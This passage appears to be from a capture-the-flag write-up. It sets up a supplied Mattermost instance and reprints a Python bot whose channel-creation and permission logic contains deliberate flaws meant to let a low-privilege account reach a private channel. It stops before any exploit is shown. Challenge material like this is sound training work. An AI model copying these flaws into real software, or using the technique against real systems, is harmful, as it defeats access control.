Task 6 Writeup

January 6, 2026
20 min read

Task 6 - Crossing the Channel - (Vulnerability Research)

Description

This high visibility investigation has garnered a lot of agency attention. Due to your success, your team has designated you as the lead for the tasks ahead. Partnering with CNO and CYBERCOM mission elements, you work with operations to collect the persistent data associated with the identified Mattermost instance. Our analysts inform us that it was obtained through a one-time opportunity and we must move quickly as this may hold the key to tracking down our adversary! We have managed to create an account but it only granted us access to one channel. The adversary doesn’t appear to be in that channel.

We will have to figure out how to get into the same channel as the adversary. If we can gain access to their communications, we may uncover further opportunity.

You are tasked with gaining access to the same channel as the target. The only interface that you have is the chat interface in Mattermost!

Downloads:

  • Mattermost instance (volumes.tar.gz)
  • User login (user.txt)

Prompt:

  • Submit a series of commands, one per line, given to the Mattermost server which will allow you to gain access to a channel with the adversary.

This time we’re given a Mattermost instance: volumes.tar.gz contains a db folder with the standard Mattermost PostgreSQL database files and a bot folder with a sample Mattermost bot implementation in Python.

We also have a user login in user.txt:

user.txt
cautiousferret5:NCfYJKXkdyrIterw

Before we look at the bot, let’s set up the Mattermost instance locally so that we can log in with the provided user and explore the application.

Mattermost setup

We don’t need to get too complicated, so let’s just set it up locally on our machine using Docker, following the Mattermost official Docker instructions.

First we clone the official Mattermost Docker repository and set up the environment file, using localhost as the domain since we’re running it locally. We also need to downgrade the PostgreSQL version, since db/var/lib/postgresql/data/PG_VERSION contains 13:

Terminal window
git clone https://github.com/mattermost/docker
cd docker
cp env.example .env
sed -i 's/DOMAIN=.*/DOMAIN=localhost/' .env
sed -i 's/POSTGRES_IMAGE_TAG=.*/POSTGRES_IMAGE_TAG=13-alpine/' .env
Warning

The default PostgreSQL image tag in the Mattermost Docker repository at the time of writing is 18-alpine, and the PostgreSQL 18 image drops the /data suffix from the Docker volume path. Since we’re downgrading to PostgreSQL 13, we also need to restore the old volume path in docker-compose.yml. Open it and change the volume mapping from /var/lib/postgresql to /var/lib/postgresql/data:

docker-compose.yml
volumes:
  # before: - ${POSTGRES_DATA_PATH}:/var/lib/postgresql
  - ${POSTGRES_DATA_PATH}:/var/lib/postgresql/data
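
If you'd rather not eyeball PG_VERSION, the version check can be scripted. The following is only a small sketch: the function name postgres_image_tag is made up for illustration, and it assumes the "-alpine" image flavour used in the .env edit above.

```python
from pathlib import Path


def postgres_image_tag(pg_version_file: str) -> str:
    """Build an image tag such as '13-alpine' from a PG_VERSION file.

    Hypothetical helper: assumes the file holds only the major version
    number and that we want the '-alpine' flavour of the image.
    """
    major = Path(pg_version_file).read_text().strip()
    if not major.isdigit():
        raise ValueError(f"unexpected PG_VERSION content: {major!r}")
    return f"{major}-alpine"
```

Calling it on the PG_VERSION file inside the extracted db folder should give the value to put in POSTGRES_IMAGE_TAG.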

Next we copy the volumes folder we extracted into the docker folder, then create the rest of the necessary folders, and set the correct permissions:

Terminal window
cp -r ../volumes .
sudo chmod -R 777 ./volumes/db
mkdir -p ./volumes/app/mattermost/{config,data,logs,plugins,client/plugins,bleve-indexes}
sudo chown -R 2000:2000 ./volumes/app/mattermost

We can skip all the certificate and nginx steps since we’re running locally, and simply deploy with Docker Compose:

Terminal window
docker compose -f docker-compose.yml -f docker-compose.without-nginx.yml up -d

And now we can log in with our provided creds and explore the Mattermost instance!

[Figure: Mattermost login screen]

Using our cautiousferret5 account, we can see that we only have access to a public channel on a team called Malware Central:

[Figure: Mattermost public channel]

The bot

Now that we have the Mattermost instance running, let’s look at the bot code in the bot folder. The bot is implemented in Python and uses the mmpy_bot library to interact with the Mattermost API. There are 7 files total:

  • bot.py: The main bot loader.
  • malware_database.py: An in-memory database for storing some malware and sale information.
  • mmpy_bot_monkeypatch.py: A monkeypatch for the mmpy_bot library to add an option to plugin commands.
  • plugin_admin.py: A plugin for admin util commands.
  • plugin_managechannel.py: A plugin for managing channel posts.
  • plugin_onboarding.py: A plugin for onboarding new users, mostly just sends a configurable announcement.
  • plugin_sales.py: A plugin for handling sales of malware.

The full source of each file is listed below, but I’ll go over the relevant parts later.

bot/bot.py
#!/usr/bin/env python
import sys
from loguru import logger
# Set log level based on -v argument
if "-v" in sys.argv:
    logger.remove()
    logger.add(sys.stderr, level="DEBUG")
else:
    logger.remove()
    logger.add(sys.stderr, level="INFO")
import mmpy_bot_monkeypatch # Ensure monkeypatch is applied before any plugin imports
from mmpy_bot import Bot, Settings
from mmpy_bot.plugins import HelpPlugin
from plugin_sales import SalesPlugin
from plugin_onboarding import OnboardingPlugin
from plugin_admin import AdminPlugin
from plugin_managechannel import ManageChannelPlugin
import os
from dotenv import load_dotenv
# Load environment variables from .env file
load_dotenv(os.path.join(os.path.dirname(__file__), '.env'))
bot = Bot(
    settings=Settings(
        MATTERMOST_URL = os.environ.get("MATTERMOST_URL", "http://127.0.0.1"),
        MATTERMOST_PORT = int(os.environ.get("MATTERMOST_PORT", 8065)),
        BOT_TOKEN = os.environ.get("BOT_TOKEN"),
        BOT_TEAM = os.environ.get("BOT_TEAM", "test_team"),
        SSL_VERIFY = os.environ.get("SSL_VERIFY", "False") == "True",
        RESPOND_CHANNEL_HELP=True,
    ),
    plugins=[SalesPlugin(), HelpPlugin(), OnboardingPlugin(),ManageChannelPlugin(),AdminPlugin()],
)
bot.run()
bot/malware_database.py
import os
import pickle
import threading
from loguru import logger
from functools import wraps
DB_FILE = os.path.join(os.path.dirname(__file__), 'malware_db.pkl')
# Decorator to lock all public methods
def locked_methods(cls):
    for attr_name, attr in cls.__dict__.items():
        if callable(attr) and not attr_name.startswith('_'):
            @wraps(attr)
            def locked(self, *args, __attr=attr, **kwargs):
                with self._lock:
                    return __attr(self, *args, **kwargs)
            setattr(cls, attr_name, locked)
    return cls
@locked_methods
class MalwareDatabase:
    def __init__(self, db_file=DB_FILE):
        self.db_file = db_file
        self._lock = threading.Lock()
    def _load_db(self):
        if not os.path.exists(self.db_file):
            return {'offerings': [], 'sales': []}
        with open(self.db_file, 'rb') as f:
            return pickle.load(f)
    def _save_db(self, db):
        with open(self.db_file, 'wb') as f:
            pickle.dump(db, f)
    def add_offering(self, offering):
        db = self._load_db()
        offering['id'] = len(db['offerings']) + 1
        logger.debug(f"Adding offering: {offering}")
        db['offerings'].append(offering)
        self._save_db(db)
        logger.info(f"Offering added with ID {offering['id']}")
        return offering['id']
    def get_offerings(self):
        db = self._load_db()
        logger.debug(f"Getting offerings: {db['offerings']}")
        return db['offerings']
    def record_sale(self, sale):
        db = self._load_db()
        logger.debug(f"Recording sale: {sale}")
        db['sales'].append(sale)
        self._save_db(db)
        logger.info(f"Sale recorded: {sale}")
    def get_sales(self):
        db = self._load_db()
        logger.debug(f"Getting sales: {db['sales']}")
        return db['sales']
# Singleton instance for use throughout the bot
db = MalwareDatabase()
# Usage in your plugin:
# from malware_database import db
# db.add_offering(...)
# db.get_offerings()
# db.record_sale(...)
# db.get_sales()
bot/mmpy_bot_monkeypatch.py
# mmpy_bot_monkeypatch.py
"""
Monkey patch mmpy_bot MessageFunction to support no_direct option.
"""
from mmpy_bot.function import MessageFunction
from mmpy_bot.utils import completed_future
import fnmatch
from loguru import logger
# Save original methods
_original_init = MessageFunction.__init__
_original_call = MessageFunction.__call__
def patched_init(self, *args, allowed_users_glob=None, **kwargs):
    logger.debug(f"patched_init called for {getattr(self, 'name', None)} with allowed_users_glob={allowed_users_glob} and no_direct={kwargs.get('no_direct', False)}")
    _original_init(self, *args, **kwargs)
    self.no_direct = kwargs.get('no_direct', False)
    # allowed_users_glob setup
    if allowed_users_glob is not None:
        logger.debug(f"Setting allowed_users_glob: {allowed_users_glob}")
        self.allowed_users_glob = [pattern.lower() for pattern in allowed_users_glob]
    elif hasattr(self, 'allowed_users_glob'):
        logger.debug("allowed_users_glob already set")
        pass # already set
    else:
        self.allowed_users_glob = []
        logger.debug("allowed_users_glob set to empty list")
def patched_call(self, message, *args):
    logger.debug(f"patched_call for {getattr(self, 'name', None)} from sender={message.sender_name}")
    # If no_direct is set and this is a direct message, skip
    if getattr(self, 'no_direct', False) and message.is_direct_message:
        logger.debug("no_direct is set and message is direct, skipping handler")
        return None if not self.is_coroutine else completed_future()
    # Combined exact and glob matching for allowed_users
    sender = message.sender_name.lower()
    allowed_exact = sender in getattr(self, 'allowed_users', [])
    allowed_glob = any(fnmatch.fnmatch(sender, pattern) for pattern in getattr(self, 'allowed_users_glob', []))
    logger.debug(f"allowed_exact={allowed_exact}, allowed_glob={allowed_glob}, allowed_users={getattr(self, 'allowed_users', [])}, allowed_users_glob={getattr(self, 'allowed_users_glob', [])}")
    if getattr(self, 'allowed_users', None) or getattr(self, 'allowed_users_glob', None):
        if not (allowed_exact or allowed_glob):
            logger.debug(f"Permission denied for sender={sender}")
            if not getattr(self, 'silence_fail_msg', False):
                self.plugin.driver.reply_to(
                    message, "You do not have permission to perform this action!"
                )
            return None if not self.is_coroutine else completed_future()
        else:
            logger.debug(f"Permission granted for sender={sender}")
    return _original_call(self, message, *args)
MessageFunction.__init__ = patched_init
MessageFunction.__call__ = patched_call
bot/plugin_admin.py
from mmpy_bot import Plugin
from mmpy_bot.scheduler import schedule
from loguru import logger
from malware_database import db
from mmpy_bot.function import listen_to
import subprocess
class AdminPlugin(Plugin):
    """
    A plugin to handle administration utilities
    """
    @listen_to("^!util df", allowed_users_glob=["mod_*","admin_*"])
    def df_cmd(self, message ):
        logger.info(f"AdminPlugin: running df")
        result = subprocess.run(["df", "-h", "-x", "tmpfs"],capture_output=True, text=True)
        self.driver.reply_to(message, f"{result.stdout}")
    @listen_to("^!util uptime$", allowed_users_glob=["mod_*","admin_*"])
    def uptime_cmd(self, message):
        logger.info("AdminPlugin: running uptime")
        result = subprocess.run(["uptime"], capture_output=True, text=True)
        self.driver.reply_to(message, f"{result.stdout}")
    @listen_to("^!util free$", allowed_users_glob=["mod_*","admin_*"])
    def free_cmd(self, message):
        logger.info("AdminPlugin: running free -h")
        result = subprocess.run(["free", "-h"], capture_output=True, text=True)
        self.driver.reply_to(message, f"{result.stdout}")
bot/plugin_managechannel.py
from mmpy_bot_monkeypatch import * # Ensure monkeypatch is applied before anything else
from mmpy_bot import Plugin, Message, listen_to
from malware_database import db
from loguru import logger
def get_pinned(driver, message: Message, *args):
    logger.debug(f"handle_get_pinned called with message: {message.text}")
    team_name = driver.options.get('team', 'malwarecentral')
    print(f"[DEBUG] Looking up team: {team_name}")
    # Get team info
    team = driver.teams.get_team_by_name(team_name)
    channel_id = message.channel_id
    posts = driver.channels.get_pinned_posts(channel_id)
    logger.info(f"found pinned posts {posts}")
    order= posts["order"]
    all_pinned ={}
    for post in order:
        all_pinned[post] = posts["posts"][post]["message"]
    logger.info(f"respons is {all_pinned}")
    return all_pinned
class ManageChannelPlugin(Plugin):
    """
    A plugin to handle Managing Channel Posts
    """
    @listen_to('^!delete nonpinned', no_direct=True,human_description="!delete nonpinned\n\tget rid of any posts that aren't pinned")
    def handle_delete_nonpinned(self : Plugin, message: Message, *args):
        all_pinned = get_pinned(self.driver, message)
        channel_id = message.channel_id
        posts = self.driver.posts.get_posts_for_channel(channel_id)["order"]
        logger.info(f"got {len(posts)} posts for this channel")
        logger.info(posts)
        logger.info(all_pinned)
        #loop through every post and delete the ones that aren't pinned
        count = 0
        while (len(posts) > len(all_pinned.items())):
            for post in posts:
                if post not in all_pinned:
                    self.driver.posts.delete_post(post)
                    count += 1
            posts = self.driver.posts.get_posts_for_channel(channel_id)["order"]
            logger.info(f"got {len(posts)} posts for this channel")
bot/plugin_onboarding.py
from mmpy_bot import Plugin
from mmpy_bot.scheduler import schedule
from loguru import logger
from malware_database import db
from mmpy_bot.function import listen_to
ANNOUNCEMENT_CHANNEL = "public"
ANNOUNCEMENT_RULES = """
Welcome to the Malware Marketplace! Please read the rules and stay safe.
1. Do not discuss illegal activities
2. Do not wreak havoc
3. Do not make $$$$
4. Don't even consider HACK(ing) THE PLANET
5. Always buck authority
Current info and updates will appear here.
"""
ANNOUNCEMENT_MIDDLE = "No current announcements"
class OnboardingPlugin(Plugin):
    """Plugin to send onboarding/welcome/rules announcements."""
    def on_start(self):
        self.announcement_middle = ANNOUNCEMENT_MIDDLE
        logger.info(f"PluginOnboarding: Sending initial announcement to {ANNOUNCEMENT_CHANNEL}")
        self.send_announcement()
        schedule.every(1).hours.do(self.send_announcement)
    @listen_to("^!update_announcement (.+)$", allowed_users_glob=["mod_*"])
    def update_announcement_cmd(self, message, new_middle):
        logger.info(f"PluginOnboarding: Announcement middle updated by {message.sender_name}")
        self.announcement_middle = new_middle
        self.send_announcement()
        self.driver.reply_to(message, "Announcement updated and sent.")
    def send_announcement(self):
        # Get team name from driver options
        team_name = self.settings.BOT_TEAM
        # Get channel info by name and team name (works for public/private)
        channel = self.driver.channels.get_channel_by_name_for_team_name(team_name, ANNOUNCEMENT_CHANNEL)
        channel_id = channel.get('id') if isinstance(channel, dict) else channel.json().get('id')
        # Get current offerings
        offerings = db.get_offerings()
        offerings_text = "Current Offerings:\n" + "\n".join([
            f"ID: {o['id']}, Name: {o['name']}, Type: {o['type']}, OS: {o['os']}, Price: {o['price']}" for o in offerings
        ]) if offerings else "No current offerings."
        announcement = f"{ANNOUNCEMENT_RULES}\n\n{self.announcement_middle}\n\n{offerings_text}"
        logger.debug(f"PluginOnboarding: Sending announcement to channel_id={channel_id}")
        self.driver.create_post(channel_id=channel_id, message=announcement)
bot/plugin_sales.py
from mmpy_bot_monkeypatch import * # Ensure monkeypatch is applied before anything else
from mmpy_bot import Plugin, Message, listen_to
from malware_database import db
from loguru import logger
MALWARE_TYPES = ["0click", "1click", "LPE", "SBE", "RCE", "Phishing", "ExploitKit", "Backdoor", "Rootkit"]
OS_TYPES = ["Windows", "Linux", "macOS", "Android", "iOS", "Unix"]
ODAYS = ["0day", "nday"]
class SalesPlugin(Plugin):
    """
    A plugin to handle sales in Mattermost.
    """
    @listen_to('^!nego (.*)$', no_direct=True,human_description="!nego channel seller moderator1 moderator2\n\tCreate a negotiation channel to close a deal!")
    def handle_nego(self : Plugin, message: Message, *args):
        logger.debug(f"handle_nego called with message: {message.text}")
        args = message.text.strip().split()
        if len(args) != 5:
            self.driver.reply_to(message, "Usage: !nego channel seller moderator1 moderator2")
            logger.warning("handle_nego: Incorrect number of arguments")
            return
        user1 = message.sender_name
        _, channel_name, user2, user3, user4 = args[:6]
        if not user4.startswith('mod_'):
            self.driver.reply_to(message, f"You must have a mod")
            return
        display_name = channel_name
        team_name = self.driver.options.get('team', 'malwarecentral')
        print(f"[DEBUG] Looking up team: {team_name}")
        # Get team info
        team = self.driver.teams.get_team_by_name(team_name)
        logger.debug(f"Team API response: {team}")
        team_id = team.get('id') if isinstance(team, dict) else team.json().get('id')
        print(f"[DEBUG] team_id: {team_id}")
        # Create channel
        channel_options = {
            "team_id": team_id,
            "name": channel_name,
            "display_name": display_name,
            "type": "P"
        }
        logger.debug(f"Creating channel with options: {channel_options}")
        try:
            channel = self.driver.channels.create_channel(channel_options)
            print(f"[DEBUG] Channel API response: {channel}")
        #hide weird exception when we have an archived channel with the same name, we'll just unarchive it
        except Exception as e:
            print(f"[DEBUG] Exception while creating channel: {e}")
            # Try to unarchive the channel if it exists
            try:
                archived_channel = self.driver.channels.get_channel_by_name(channel_name, team_id)
                if archived_channel and archived_channel.get('delete_at') > 0:
                    logger.info(f"Unarchiving existing channel: {archived_channel}")
                    self.driver.channels.unarchive_channel(archived_channel.get('id'))
                    channel = archived_channel
            except Exception as e:
                self.driver.reply_to(message, f"Failed to create or unarchive channel: {e}")
        #we either created a new channel or unarchived an existing one
        print(f"[DEBUG] getting channel: {channel_name} in team {team_id}")
        channel = self.driver.channels.get_channel_by_name(team_id, channel_name)
        channel_id = channel.get('id') if isinstance(channel, dict) else channel.json().get('id')
        print(f"[DEBUG] channel_id: {channel_id}")
        # Get user ids
        user_ids = []
        for uname in [user1, user2, user3, user4]:
            logger.debug(f"Looking up user: {uname}")
            user = self.driver.users.get_user_by_username(uname)
            logger.debug(f"User API response: {user}")
            uid = user.get('id') if isinstance(user, dict) else user.json().get('id')
            logger.debug(f"user_id for {uname}: {uid}")
            if not uid:
                self.driver.reply_to(message, f"User not found: {uname}")
                logger.warning(f"handle_nego: User not found: {uname}")
                return
            user_ids.append(uid)
        if len(set(user_ids)) != 4:
            logger.warning(f"incorrect number of users to run command")
            self.driver.reply_to(message, f"incorrect number of users to run command")
            return
        print(f"[DEBUG] All user_ids: {user_ids}")
        # Check if channel already has members
        existing_members = self.driver.channels.get_channel_members(channel_id)
        existing_member_user_ids = [member.get('user_id') for member in existing_members]
        existing_user_ids = any(uid in user_ids for uid in existing_member_user_ids)
        if existing_user_ids:
            # If the channel already has members, we should not add them again
            # This is a safeguard against creating duplicate entries in an archived channel
            print(f"[DEBUG] Existing members in channel {channel_id}: {existing_member_user_ids}, this shouldn't happen! archived channels should be empty")
            return
        # make sure not adding randos
        current_members_ids = [m['user_id'] for m in self.driver.channels.get_channel_members(message.channel_id)]
        if not (user_ids[0] in current_members_ids and user_ids[1] in current_members_ids and
                user_ids[2] in current_members_ids and user_ids[3] in current_members_ids):
            self.driver.reply_to(message, f"Could not find users")
            return
        # Add users to channel
        for uid in user_ids:
            logger.debug(f"Adding user {uid} to channel {channel_id}")
            self.driver.channels.add_channel_member(channel_id, {"user_id": uid})
        self.driver.reply_to(message, f"Created channel '{display_name}' and added users: {user1}, {user2}, {user3}")
        logger.info(f"Created channel '{display_name}' and added users: {user1}, {user2}, {user3}")
    @listen_to('^!add_offering (.*)$', no_direct=True,allowed_users_glob=["mod_*"], human_description="!add_offering name type os oday_or_nday creator price\n\tAdd a new malware offering.")
    def add_offering_cmd(self, message: Message, *args):
        args = message.text.strip().split()
        logger.debug(f"add_offering_cmd called with args: {args}")
        if len(args) != 7:
            self.driver.reply_to(message, "Usage: !add_offering name type os oday_or_nday creator price")
            logger.warning("add_offering: Incorrect number of arguments")
            return
        _, name, mtype, osys, oday_nday, creator, price = args
        mtype_lc = mtype.lower()
        osys_lc = osys.lower()
        oday_nday_lc = oday_nday.lower()
        logger.debug(f"Normalized values: type={mtype_lc}, os={osys_lc}, oday_nday={oday_nday_lc}")
        if mtype_lc not in [t.lower() for t in MALWARE_TYPES]:
            self.driver.reply_to(message, f"Invalid malware type. Allowed: {', '.join(MALWARE_TYPES)}")
            logger.warning(f"add_offering: Invalid malware type '{mtype}'")
            return
        if osys_lc not in [o.lower() for o in OS_TYPES]:
            self.driver.reply_to(message, f"Invalid OS. Allowed: {', '.join(OS_TYPES)}")
            logger.warning(f"add_offering: Invalid OS '{osys}'")
            return
        if oday_nday_lc not in [d.lower() for d in ODAYS]:
            self.driver.reply_to(message, "oday_or_nday must be '0day' or 'nday'.")
            logger.warning(f"add_offering: Invalid oday_or_nday '{oday_nday}'")
            return
        team_name = self.driver.options.get('team', 'malwarecentral')
        team = self.driver.teams.get_team_by_name(team_name)
        team_id = team.get('id') if isinstance(team, dict) else team.json().get('id')
        user = self.driver.users.get_user_by_username(creator)
        if not user or (user.get('id') if isinstance(user, dict) else user.json().get('id')) is None:
            self.driver.reply_to(message, f"Creator '{creator}' is not a valid user in the team.")
            logger.warning(f"add_offering: Creator '{creator}' is not a valid user in the team.")
            return
        try:
            price_val = float(price)
            if price_val < 0:
                raise ValueError
        except ValueError:
            self.driver.reply_to(message, "Price must be a positive number.")
            logger.warning(f"add_offering: Invalid price '{price}'")
            return
        offering = {
            'name': name,
            'type': mtype_lc,
            'os': osys_lc,
            'oday_or_nday': oday_nday_lc,
            'creator': creator,
            'price': price_val
        }
        logger.info(f"Adding offering: {offering}")
        oid = db.add_offering(offering)
        self.driver.reply_to(message, f"Offering added with ID {oid}.")
        logger.info(f"Offering added with ID {oid}")
    @listen_to('^!get_offerings (.*)$', no_direct=True, human_description="!get_offerings\n\tList all malware offerings.")
    def get_offerings_cmd(self, message: Message, *args):
        logger.debug(f"get_offerings_cmd called with message: {message.text}")
        offerings = db.get_offerings()
        logger.debug(f"Offerings retrieved: {offerings}")
        if not offerings:
            self.driver.reply_to(message, "No offerings available.")
            logger.info("get_offerings_cmd: No offerings available.")
            return
        msg = "Malware Offerings:\n" + "\n".join([
            f"ID: {o['id']}, Name: {o['name']}, Type: {o['type']}, OS: {o['os']}, Oday/Nday: {o['oday_or_nday']}, Creator: {o['creator']}, Price: {o['price']}"
            for o in offerings
        ])
        self.driver.reply_to(message, msg)
        logger.info("get_offerings_cmd: Sent offerings list.")
    #TODO update these users to be other admins we expect to be listed within the team
    @listen_to('^!record_sale (.*)$', no_direct=True, allowed_users_glob=["mod_*"],human_description="!record_sale buyer price offering_id\n\tRecord a sale of malware.",allowed_users=["badguy","otherbadguy","some guys","user1"])
    def record_sale_cmd(self, message: Message, *args):
        logger.debug(f"record_sale_cmd called with message: {message.text}")
        args = message.text.strip().split()
        if len(args) != 4:
            self.driver.reply_to(message, "Usage: !record_sale buyer price offering_id")
            logger.warning("record_sale_cmd: Incorrect number of arguments")
            return
        _, buyer, price, offering_id = args
        # Validate buyer is a user in the team
        team_name = self.driver.options.get('team', 'malwarecentral')
        team = self.driver.teams.get_team_by_name(team_name)
        team_id = team.get('id') if isinstance(team, dict) else team.json().get('id')
        user = self.driver.users.get_user_by_username(buyer)
        if not user or (user.get('id') if isinstance(user, dict) else user.json().get('id')) is None:
            self.driver.reply_to(message, f"Buyer '{buyer}' is not a valid user in the team.")
            logger.warning(f"record_sale_cmd: Buyer '{buyer}' is not a valid user in the team.")
            return
        # Seller is the creator of the offering
        offerings = db.get_offerings()
        offering = next((o for o in offerings if str(o['id']) == offering_id), None)
        if not offering:
            self.driver.reply_to(message, f"Offering ID {offering_id} not found.")
            logger.warning(f"record_sale_cmd: Offering ID {offering_id} not found.")
            return
        seller = offering['creator']
        sale = {
            'buyer': buyer,
            'seller': seller,
            'price': price,
            'offering_id': offering_id
        }
        logger.info(f"Recording sale: {sale}")
        db.record_sale(sale)
        self.driver.reply_to(message, f"Sale recorded for offering ID {offering_id}.")
        logger.info(f"Sale recorded for offering ID {offering_id}")

mmpy_bot listens for messages in channels and direct messages. When a message matches a registered command pattern, it calls the corresponding handler function in the plugin.

bot/plugin_admin.py
@listen_to("^!util uptime$", allowed_users_glob=["mod_*","admin_*"])
def uptime_cmd(self, message):
    logger.info("AdminPlugin: running uptime")
    result = subprocess.run(["uptime"], capture_output=True, text=True)
    self.driver.reply_to(message, f"{result.stdout}")

For example, this command listens for messages that match the regex ^!util uptime$ and are sent by users whose usernames match the glob patterns mod_* or admin_*. When such a message is received, it runs the uptime_cmd function, which executes the uptime command on the server and replies with the output.
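
To make the dispatch idea concrete, here is a toy version of it using only the standard library. This is not mmpy_bot's actual implementation: HANDLERS, listen_to_sketch and dispatch are hypothetical names, and the handlers just return strings instead of talking to Mattermost. It only illustrates how a regex decides which handler runs and how capture groups become extra arguments.

```python
import re
from typing import Callable, List, Optional, Tuple

# Hypothetical registry of (compiled pattern, handler); not mmpy_bot internals.
HANDLERS: List[Tuple[re.Pattern, Callable[..., str]]] = []


def listen_to_sketch(pattern: str):
    """Register the decorated function under a regex, like a toy listen_to."""
    def decorator(func):
        HANDLERS.append((re.compile(pattern), func))
        return func
    return decorator


@listen_to_sketch(r"^!util uptime$")
def uptime_cmd(text: str) -> str:
    return "uptime handler called"


@listen_to_sketch(r"^!nego (.*)$")
def nego_cmd(text: str, rest: str) -> str:
    # The capture group from the pattern arrives as an extra argument.
    return f"nego handler called with: {rest}"


def dispatch(text: str) -> Optional[str]:
    """Call the first handler whose pattern matches the message text."""
    for pattern, handler in HANDLERS:
        match = pattern.search(text)
        if match:
            return handler(text, *match.groups())
    return None
```

Because of the trailing $ in ^!util uptime$, a message like "!util uptime now" matches nothing in this sketch, while "!nego a b c d" reaches nego_cmd with "a b c d" as the captured group.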

Some of the commands also have a no_direct=True option, which means they will not respond to direct messages. This is implemented in the monkeypatch in mmpy_bot_monkeypatch.py.

bot/mmpy_bot_monkeypatch.py
# mmpy_bot_monkeypatch.py
"""
Monkey patch mmpy_bot MessageFunction to support no_direct option.
"""
from mmpy_bot.function import MessageFunction
from mmpy_bot.utils import completed_future
import fnmatch
from loguru import logger
# Save original methods
_original_init = MessageFunction.__init__
_original_call = MessageFunction.__call__
def patched_init(self, *args, allowed_users_glob=None, **kwargs):
    logger.debug(f"patched_init called for {getattr(self, 'name', None)} with allowed_users_glob={allowed_users_glob} and no_direct={kwargs.get('no_direct', False)}")
    _original_init(self, *args, **kwargs)
    self.no_direct = kwargs.get('no_direct', False)
    # allowed_users_glob setup
    if allowed_users_glob is not None:
        logger.debug(f"Setting allowed_users_glob: {allowed_users_glob}")
        self.allowed_users_glob = [pattern.lower() for pattern in allowed_users_glob]
    elif hasattr(self, 'allowed_users_glob'):
        logger.debug("allowed_users_glob already set")
        pass # already set
    else:
        self.allowed_users_glob = []
        logger.debug("allowed_users_glob set to empty list")
def patched_call(self, message, *args):
    logger.debug(f"patched_call for {getattr(self, 'name', None)} from sender={message.sender_name}")
    # If no_direct is set and this is a direct message, skip
    if getattr(self, 'no_direct', False) and message.is_direct_message:
        logger.debug("no_direct is set and message is direct, skipping handler")
        return None if not self.is_coroutine else completed_future()
    # Combined exact and glob matching for allowed_users
    sender = message.sender_name.lower()
    allowed_exact = sender in getattr(self, 'allowed_users', [])
    allowed_glob = any(fnmatch.fnmatch(sender, pattern) for pattern in getattr(self, 'allowed_users_glob', []))
    logger.debug(f"allowed_exact={allowed_exact}, allowed_glob={allowed_glob}, allowed_users={getattr(self, 'allowed_users', [])}, allowed_users_glob={getattr(self, 'allowed_users_glob', [])}")
    if getattr(self, 'allowed_users', None) or getattr(self, 'allowed_users_glob', None):
        if not (allowed_exact or allowed_glob):
            logger.debug(f"Permission denied for sender={sender}")
            if not getattr(self, 'silence_fail_msg', False):
                self.plugin.driver.reply_to(
                    message, "You do not have permission to perform this action!"
                )
            return None if not self.is_coroutine else completed_future()
        else:
            logger.debug(f"Permission granted for sender={sender}")
    return _original_call(self, message, *args)
MessageFunction.__init__ = patched_init
MessageFunction.__call__ = patched_call
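
The permission logic in patched_call is easier to reason about once it's pulled out into a pure function. The sketch below restates it under a made-up name, is_permitted, and assumes the glob patterns are already lowercase (patched_init lowercases them). The username mod_alice is invented for the example.

```python
import fnmatch
from typing import Sequence


def is_permitted(
    sender: str,
    allowed_users: Sequence[str] = (),
    allowed_users_glob: Sequence[str] = (),
) -> bool:
    """Restate the allow-list check from patched_call as a pure function."""
    sender = sender.lower()
    # With no exact list and no glob list, the command is open to everyone.
    if not allowed_users and not allowed_users_glob:
        return True
    allowed_exact = sender in allowed_users
    allowed_glob = any(fnmatch.fnmatch(sender, p) for p in allowed_users_glob)
    return allowed_exact or allowed_glob


# Our account fails the glob check used by the admin commands...
print(is_permitted("cautiousferret5", allowed_users_glob=["mod_*", "admin_*"]))
# ...but passes for commands that declare no allow-list at all.
print(is_permitted("cautiousferret5"))
# A hypothetical moderator name matches the mod_* glob.
print(is_permitted("mod_alice", allowed_users_glob=["mod_*"]))
```

Note that the exact list and the glob list are combined with "or", so matching either one is enough.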

Unfortunately for us, most of the commands have restrictions that prevent our user, cautiousferret5, from using them. Here’s every command along with its restrictions:

all plugin commands
# plugin_admin.py
@listen_to("^!util df", allowed_users_glob=["mod_*","admin_*"])
@listen_to("^!util uptime$", allowed_users_glob=["mod_*","admin_*"])
@listen_to("^!util free$", allowed_users_glob=["mod_*","admin_*"])
# plugin_managechannel.py
@listen_to('^!delete nonpinned', no_direct=True,human_description="!delete nonpinned\n\tget rid of any posts that aren't pinned")
# plugin_onboarding.py
@listen_to("^!update_announcement (.+)$", allowed_users_glob=["mod_*"])
# plugin_sales.py
@listen_to('^!nego (.*)$', no_direct=True,human_description="!nego channel seller moderator1 moderator2\n\tCreate a negotiation channel to close a deal!")
@listen_to('^!add_offering (.*)$', no_direct=True,allowed_users_glob=["mod_*"], human_description="!add_offering name type os oday_or_nday creator price\n\tAdd a new malware offering.")
@listen_to('^!get_offerings (.*)$', no_direct=True, human_description="!get_offerings\n\tList all malware offerings.")
@listen_to('^!record_sale (.*)$', no_direct=True, allowed_users_glob=["mod_*"],human_description="!record_sale buyer price offering_id\n\tRecord a sale of malware.",allowed_users=["badguy","otherbadguy","some guys","user1"])
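
A list like the one above can also be pulled out of the plugin sources mechanically. The following is a rough sketch: summarize_commands is a hypothetical helper, and it relies on the assumption (true for these files) that each @listen_to decorator fits on a single line.

```python
import re
from typing import Dict, List, Union

# Capture the first quoted argument of a single-line @listen_to(...) decorator.
LISTEN_TO = re.compile(r"""@listen_to\(\s*(['"])(?P<pattern>.*?)\1""")


def summarize_commands(source: str) -> List[Dict[str, Union[str, bool]]]:
    """Summarize each @listen_to decorator found in a plugin's source text."""
    rows = []
    for line in source.splitlines():
        match = LISTEN_TO.search(line)
        if not match:
            continue
        rows.append({
            "pattern": match.group("pattern"),
            # True for both allowed_users=... and allowed_users_glob=...
            "restricted": "allowed_users" in line,
            "no_direct": "no_direct=True" in line,
        })
    return rows
```

Any row with restricted set to False is a command an ordinary account can trigger, as long as the message is sent in a channel when no_direct is True.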

Of the listed commands, the only one that we can use and that adds users to a channel is the !nego command in plugin_sales.py. It creates a private negotiation channel and adds the sender, a seller, and two moderators to it.
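
The first checks that handle_nego applies to its input can be restated in isolation. This is a sketch only: parse_nego is a made-up name, it returns values instead of replying in chat, and it covers just the argument count and the mod_ prefix check, not the later user and channel lookups.

```python
from typing import Optional, Tuple

USAGE = "Usage: !nego channel seller moderator1 moderator2"


def parse_nego(text: str) -> Tuple[Optional[Tuple[str, str, str, str]], Optional[str]]:
    """Return ((channel, user2, user3, user4), None) or (None, error message)."""
    args = text.strip().split()
    if len(args) != 5:
        return None, USAGE
    _, channel_name, user2, user3, user4 = args
    # Only the last argument is required to start with 'mod_'.
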